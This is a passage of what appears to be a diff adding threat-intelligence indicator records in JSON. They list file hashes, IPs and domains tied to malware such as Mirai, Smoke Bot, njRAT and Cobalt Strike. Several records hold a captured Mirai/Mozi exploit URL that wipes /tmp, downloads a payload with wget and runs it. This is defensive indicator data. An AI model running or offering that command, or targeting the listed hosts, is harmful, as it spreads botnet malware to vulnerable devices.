"http://194.143.143.192/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273519480876, + "ip": [ + "194.143.143.192" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "f24962259218e093c4fe3e3bc0b3c0c3e9c301f0", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + 
"seqUpdate": 17273519482447, + "ip": [ + "120.86.252.170" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a3483975e9d8ce6daeb9e54fe6cad381cbe1d8e4", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273536561141, + "hash": [ + "fb0737983ee9065b9d21b8b2ce428e77", + "03d9f0baf181896f52c33619e6f45b29d5d5e465", + "55dd84748c88f14c855ee9044a85246594c15a1196d740ca8254045b6695e18c" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "912b970d19744cda339619eb6a7c1b4ce5b26934", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17273561443391, + "hash": [ + "ab88373fd734105eebbed4d6ac6f4435", + "a82c1cee6deee48bc592e912aadd3fb292ecd64e", + "62a701d9b6fc0ef1c74c2f1ac76550012c9aa444ccb6dabdab530945d52633d8" + ], + "malwareList": [ + { + "name": "MyloBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "1e29ab694b84b499145d4dd343ffd1d3ec6b3557", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604058001, + "hash": [ + "7564fc9db09034f49408c33fae34a335", + "c0a49e5e0054673b3cea2a9e279c896eb2ebec27", + "d6d722ae73ddff1ad7c468feca882b159a2a6e267df8b219482b514cdab74c21" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "078bd3e8aaae481bbae32cefddeb6cfba6d041f6", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604060781, + "hash": [ + "d3e53eaa4b26ea3661a22b0ceaa73bc8", + "8b2d1591a0d3261df5685c74b8fcdf299949d48b", + 
"a1ace76bdd012b9ffeaed78b7b6f0e2ab36b4d5f8479a3ca1115280e6ac7b114" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "f5e1065b0464ea6a7b4c9d0d03723448d7e85de7", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604064240, + "hash": [ + "acaf7cfa20d76304b9f970ba07595d7e", + "c1930ece54b0a5444ad89bb5028d8b96d8f00220", + "dec46d0d064e84936011b85f9811d730c4aff2df02e27939ecaf9f0134a82e15" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "46ada78c012163198f16f24950c4aa7090f99d22", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604067059, + "hash": [ + "1af917cc1468fd09560d936f86ea3aa9", + "22dfde080f599dfb84f105cae2b6608a7fe2ce2e", + "d1f79248c500e1e0b3874aaaf1a15b8d01894325e5e0f885c3f8e5bf1c91b505" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "04109c9716b1f776ff6272ca28ea4d41658c5efe", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604069715, + "hash": [ + "469cde5e3b56a12d497c351d56b94cb4", + "75403f67807df66ace3f1bce1bcaf1814eaff939", + "9643f68b5bcc82efed6be3844c93f54437ffb7434dfc80d04165cb663f7d6fd1" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d97d1e2a171246533a0f36f7d6337e0185d23e00", + "type": "file", + 
"dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604073277, + "hash": [ + "37b1a8a83fe1963f5585dc49dc0acb38", + "5ae416c5123bf4a4d22eb0f2c91798d3e0f1528f", + "31beefcb8e8211a9825a1fd9a423b95e15fbf61fdeded63d2ce24448326a0d89" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6dee09adf8c668321362a2b266cc165001e62de7", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273604076907, + "hash": [ + "962a7fcc07189cb9b758a2b6a5ab3e4d", + "1277453dd5f92c3941913bf4f0f223857409b57c", + "404d888f3cdda724db8d2a9683372c38cb4f96731c6cd7a8334511d4150c9602" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "224db5cb82cdfa02efa711e00e08275060f67a36", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273605623283, + "hash": [ + "badfab85449ac9f1586e8266770ddeb5", + "e8ae2d85515aaf1d002e3736c230412d01795c79", + "04df236e0d914d5ef690fa60016a3107653e90c3dd67271d7e3defbfecd88b1e" + ], + "malwareList": [ + { + "name": "Phorpiex", + "aliases": [ + "Trik", + "Wortrik", + "Phintok" + ] + } + ], + "threatList": null + }, + { + "id": "d159f479dfa95cbf2606095937d3f704d20b9457", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://185.186.95.51/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273634718083, + "ip": [ + "185.186.95.51" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": 
"e5e3fb7589195da782e4e82da87da5ca193ef48d", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273634718811, + "ip": [ + "112.94.96.92" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "5ff44ee97dad6714949b2a4f63ca2c144ff952d0", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273659674332, + "hash": [ + "05f5ab4efc8d855dc074df34fdd866a5", + "ebba660f3769823f9b22a8fa58cf666322e34fed", + "39a23c0fbaa450043d4c0fb59595cd63edb160f7715e64516808f06956334df4" + ], + "malwareList": [ + { + "name": "AsyncRAT", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "568daf549d655412c2de2cd1155c973c7fbb67b0", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "domain": "slopere.su", + "seqUpdate": 17273682697741, + "malwareList": null, + "threatList": [ + { + "name": "TA505", + "title": "TA505 - New indicators have been found" + } + ] + }, + { + "id": "d526d0be452ae6222e7682a2cf596e69ed99aba5", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273701715388, + "hash": [ + "225d44333aad40690bcec096808d5112", + "5a14203c64f3f7d018b75f099c74c0bd92691513", + "a6f730750e5b45d5a55faad8aabb950ef006ae0298a0c6ed62fc2b519f3220dd" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b7faf485e91ee6f29987f1e0813fea4b7ee1c964", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273702141437, + "hash": [ + "28e54d0543fe094541b5bee55924be59", + "20a24bb5efc45e81e65a7f8f09c7b1b7eb40d1b1", + "a3e4d8fbb80f2b03853df91b4d82df425bc7d89a16e2296a06c93bca416c786b" + ], + "malwareList": [ + { + 
"name": "AveMaria", + "aliases": [ + "Ave Maria", + "Ave_Maria", + "MortyStealer", + "WARZONE RAT" + ] + } + ], + "threatList": null + }, + { + "id": "1bbe379e9f42722176991bae22ac1cdf1f5f9d7a", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273707281899, + "ip": [ + "119.202.158.151" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fe567837874cc0f9ecb569837e0676c980b2f34f", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273708992795, + "hash": [ + "0e46f4ee2809e9b76b248941e3905b7a", + "885b49691b6222c27b05b4a8c27cff2dbde02803", + "6b669304f2bc1d71fc402fb31e609a339d73a2480235626e79072f40a1913726" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "ee3d91cb5280d788ddbd842a5096825cbd41024d", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273721270263, + "hash": [ + "93a7e55934ecc4b48b14d03b820a01fc", + "32268eb3279f4eecb5bde4a7d3f6fc97a4fa5b9e", + "3136bdf8bfebee8e96741c180b79b628f5200720ec0f28a380aeb4d100b259c9" + ], + "malwareList": [ + { + "name": "Cobalt Strike", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "7b9504601f34e0bc3aac871d977439e4b8af9796", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273751084494, + "hash": [ + "7a7c37c2afadabad47d97e9162539c2d", + "b0eb6816c3012cafb81f183369f0d1b67293ab53", + "03114f3ae91f8ef889386171d41a583442adb22aff8704699cd08000ab859fdf" + ], + "malwareList": [ + { + "name": "ZLoader", + "aliases": [ + "Terdot", + "Axe Bot" + ] + } + ], + "threatList": null + }, + { + "id": "8995823d2d6c34919517491fb5ebd56725782359", + "type": "network", + 
"dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://91.241.87.28/shell?cd+/tmp;rm+-rf+*;wget+http:/103.203.72.254:56026/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273879401403, + "ip": [ + "91.241.87.28" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ed2bdd18fc6c0bcadeec7c971532a6cf68d646f3", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273879402076, + "ip": [ + "103.203.72.254" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "37fa409a43d926a3b8c30cbd978d08a1bfeadd07", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "url": "http://194.143.143.168/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17273879404209, + "ip": [ + "194.143.143.168" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "cbe455aebe8c99151cf2298465d33a69d841943d", + "type": "network", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-26T00:00:00+03:00", + "seqUpdate": 17273879405178, + "ip": [ + "121.206.155.103" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fe76b71a44593c81eef6aca2dda15ac86910d767", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "domain": "xmagua.com", + "seqUpdate": 17273898669374, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "93e94c554130c0bb72fedbc0d94fcfc7981bebdb", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": 
"2024-09-27T00:00:00+03:00", + "seqUpdate": 17273963145716, + "hash": [ + "3d4315b68a9b86215ebec5555af2cae6", + "2b413445a55224fc5f999448fe60dec2d85cb792", + "3aefe4dceaaddcae9dfcb342d88f16c229d090ba13e7808957cbd103a0302331" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6838ea12080fd687d21892ae6ee9236c6dadecdc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993512715, + "hash": [ + "52a93d34637da1028d3e55bfed46d968", + "33b6899cdc1ae0d0b581122c6b94115196e4836e", + "49df550c89322250e8524a0047e6e8cd0371ea7acf9c3b1645d6bd1a98c3ef32" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "48cb73be978aeb8c68102dba42620a98b8484522", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993516751, + "hash": [ + "c4fe1ccedd6423de4a1882f205a72771", + "a40259134139e45cc61151cf44ea57c7875c308f", + "512d6c134ff74aa2bc73fbf557cb7d7ddc5facfe0928cbc374220b22296af121" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4117c2152ba5492b8e810a100a13a41d5c4b6141", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993520084, + "hash": [ + "c5c22e946dd9cf45a5d93f01f76af144", + "4759ac130123ce4ccd5fb14118888463067843a5", + "d9a9c2b3660cc1e116f34119e3aeb488e1221a25cc9bae9702f877a5860777d5" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": 
"bd1254fd448e414b66fa9835d195759b68145e0b", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993523218, + "hash": [ + "f4e0b23dc97b5d0a3e3b42e4dbd93202", + "3a6c5db4838a9583e5e84102e77874d15ec08a01", + "47d23fb419cf516255fcffeb7608b122020c8b9ac8c6c8b439ec87c92547e993" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "3a0f7575d60fced3876a5ccac8c70aee39eaef67", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993755688, + "hash": [ + "8e1e7ad1f120e5d8aa2a9dfcf0159d3a", + "9cc1f2f5588dbda40466f0bdd8ec91bbb92018e9", + "0966adc457324cbfe70dbce729ef59c622bb78b9cbffdea1352954c5e28daff1" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "45429f65fb751f5a8906c738de3512a574715801", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993759079, + "hash": [ + "4e3b4f43f7186afd590834783e2d7479", + "d03e620898aaf06c268ececc4eb30bd97987b15f", + "c0edcdfa08896d04a364dd630e002b5940234377e5dc2a4e658a4a9ae2df5486" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "f22a3cf1a746a188a97e630cfe06230c673b55f0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993762628, + "hash": [ + "914a47d6adecf897d16ee9308ed05617", + "087719b9f4c5f142647e1246a02380866a0fca91", + 
"dd1c8ddf23c2a51af4815dd149e86fd649110b188ca9ab1b8a0552a6391f95e9" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "752438f0a1568a29992181b831dd2b5848c7c3ee", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17273993765672, + "hash": [ + "0806d0093d3d242b2792c9abeae65cfc", + "269924e0965f4699aaa096922ae3da02b7513875", + "0ba685c02c726f1a681a8553dba4171288ef00ac00aea006f57ff4d38dc0309c" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "0601dccdd02539acbecfbd40bc7a46771e9aeda7", + "type": "file", + "dateFirstSeen": "2024-09-26T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274008751126, + "hash": [ + "934cada73c388a3458f1c095bca835f8", + "b455ff1ec506331da89cb81965717f026b33c8d6", + "5b44291f2e80924876f60ddb1903e7ebf9608f4ecdd0294bfaaaa10012996f37" + ], + "malwareList": [ + { + "name": "DanaBot", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "a9e9bf6bfa7c25b2b498bd751b8c8b975c4f4c7e", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-10-19T00:00:00+03:00", + "domain": "virtualtour.giorgiotesigroup.it", + "url": "https://virtualtour.giorgiotesigroup.it/loginGponForm/diag_Form?images/", + "seqUpdate": 17274023166361, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6d6a3377bbdac8893c0fef6ddfed6dedc5779e10", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274061741089, + "hash": [ + "78999d8fffb3e8ff2d45e381f9d87a83", + "33ea3b3931f6a4ac0b1e9ff0f22badabfe623272", + 
"ed641f90a7628758b0930d2fb397b9a43ae87035d46d87e46bbdc86dd91f50e8" + ], + "malwareList": [ + { + "name": "Astaroth", + "aliases": [ + "Guildma" + ] + } + ], + "threatList": null + }, + { + "id": "92212aeeb8a2a96ec9108c0fabeedbfaf7aed72f", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274122343435, + "hash": [ + "7ad6d40e8a6d724cf5c95530c22d5fd6", + "e14e725b9190cc02fd7c45862478a904a73f2da4", + "080cbec63a7bae053d1d0f01279de040c16fe2547721948fc2b430a16486d8e4" + ], + "malwareList": [ + { + "name": "FlawedAmmyy", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "47b903351bb9002258c766be0a0ec7e0e33a23e2", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274133648980, + "hash": [ + "be48feeb2c34c27683bdaec79681b6da", + "83c2ee9c521a42c84eed2b2d1ce1d582df560553", + "e0997b0ac8b9e32862c06c50a1d32fbee49eb8cb9beb28274505c3671a4505e8" + ], + "malwareList": [ + { + "name": "Loki PWS", + "aliases": [ + "Loki Bot", + "Primarypass", + "LokiBot" + ] + } + ], + "threatList": null + }, + { + "id": "e4c391246ee66435953ed732b182b88b9e8f2dfc", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274151161223, + "hash": [ + "3c6b6256b96f96d1fce5eb57f42e304d", + "64b8be6fa8bf1f773238afe54162f916327415b0", + "c09e663ee811c23168adc44a617bae342a197f517b82e3172d4749610414db13" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" + ] + } + ], + "threatList": null + }, + { + "id": "3bffce7380dc0dfca236a3cf0ade95b33ddb189e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274151164129, + "hash": [ + "d8920bae87b16f748fd9e904271aa7f4", + "fcd752ddb5ff4c34c3e1514decb7e388c2ef67b2", + 
"f40e4633286e09e93d57798a17310a52964cd9817fbd3ad4f8b621afb9b524fa" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" + ] + } + ], + "threatList": null + }, + { + "id": "28bf29854acdc3486e29465aa2075023203923ee", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-10-10T00:00:00+03:00", + "domain": "access.cloudportal.it", + "url": "https://access.cloudportal.it/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274183734055, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "e6158fca5ff29d3049680b78c19a6173766be14a", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-10-10T00:00:00+03:00", + "url": "http://185.186.95.13/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17274183734056, + "ip": [ + "185.186.95.13" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ac3f12cd4d1491e9bb75a2fe6bfae9c0b944812a", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274183735468, + "ip": [ + "120.85.94.79" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "856bfd8b12ae01e6614b11fbc28359ce8cb031fe", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274199337092, + "hash": [ + "d0881012a19f61a0a90dd0771a4dc13b", + "2ad5b2f0c8a4dd695cfc82ccc0f665c938ca8dfd", + "ac9526244b68d20206d7427e87bee3bfea36471b57e80c9e7d029413050bbebd" + ], + "malwareList": [ + { + "name": "HawkEye", + "aliases": [ + "HawkSpy" + ] + } + ], + "threatList": null + }, + { + "id": "b77bad72c59e7ee1056bbc13acc30233f07c343e", + "type": 
"file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274214017025, + "hash": [ + "f999ed4f994babcd90b213ea113fe365", + "393961cd933e39df381a51d2fe042d1361538631", + "908bec6e52c2e68cfb84945303a97ea39afc2adb295d3a020158ae0a3afe4dc0" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "122891e7e16933b477696577d35cad97baca9e79", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274245160239, + "hash": [ + "859f0d226967a59c62709c81728c99f3", + "57a8b9f5159e1578032f2a90db46dcbb9c5ed0e5", + "c3e9dc315af9a1d3d069192ded2e62cbff92146c53278375db8d46f9c6011bc5" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "86d0f36f47f870a806ecd78d433e50d65c208df4", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274253963815, + "hash": [ + "ea1a831b2a3dd0abc6c3f58e2e6205a3", + "6c99dfaf83fbb5ef2e5919f85ed2e4a8834297e8", + "5f8505f90cd7e0249decddf45ab028dca561d51a30af19bffce335df2774b5a6" + ], + "malwareList": [ + { + "name": "NetWire", + "aliases": [ + "NetWiredRC" + ] + } + ], + "threatList": null + }, + { + "id": "5d325ea308211d0571127796b79d9d5577d77af0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274254232671, + "hash": [ + "bff93fe311476ba5c12ab32ff5d0bd79", + "57e3ec672c81f6c5d03d7a19745567de83a30ddf", + "62f716ee3a6f91afceb15d1ceebabcdaf64f8419c23455e16cc61e0046cbe71a" + ], + "malwareList": [ + { + "name": "Spora", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "d0dc5e78ac58ca44e77c6ec867cda062c636395e", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274257799330, 
+ "hash": [ + "ada5381da7ba527d297cb1cada584374", + "7555cbd921be55399d9dbe73842786a3a297b818", + "838a7cb3c10957431e1d98e966a0ff4c56043a00d970150872d6fffb288d7c41" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "912c288c270b59ad9480f1123efaf706ac88fdd0", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274270017561, + "hash": [ + "412ccb2daeee89a4ecc7d28b86b9aada", + "05074de8d74d40700f790ffd19cc1722a8fa2755", + "d6ddcee7af045b9c4cf8198eb749b7820a4d4d75c3b7a8e93a41f5f713b24c6c" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "516b8ee6f45886cdb85249acdf62f1c01f54c057", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274270021452, + "hash": [ + "18b924fe6f78286cbe540c57b2bd898f", + "0977ec622e2d7cdbeb1e3e9bcade86c42e01ab3f", + "5db2c8add5a360b891d13c795f5315e654d0eeae76f18dc9a7e3deff159c61ba" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "1e8329c7a059790233a660cede5654242dbcd11c", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274270024405, + "hash": [ + "02c9f207fa4310989e87fa5564e5b6b8", + "323030b117bdc48c1901e95f831b920575060a0f", + "633115d046ebe495d865a782e834b2b1f071d21ef4da749f4a3245a5184eaec2" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "952bf6320769ee1353e40b32f48efce9d807891d", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274274659552, + "hash": [ + "b18d047e5365cd01e9b30775b50ed2d5", + "773e86e04678cbd7faf3a457d8f42ec18373b357", + 
